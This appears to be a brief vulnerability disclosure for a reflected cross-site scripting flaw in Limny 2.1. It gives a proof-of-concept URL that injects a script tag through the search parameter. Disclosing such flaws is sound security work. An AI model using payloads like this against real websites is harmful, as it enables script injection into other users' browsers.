Search
Software Vulnerability Tested On Date
Limny 2.1 Reflected Cross-site Scripting Windows Vista + XAMPP 9/15/2010
Description
A vulnerability in Limny 2.1 can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/limny-2.1/index.php?q=%22%3E%3Cscript%3Ealert(0)%3C/script%3E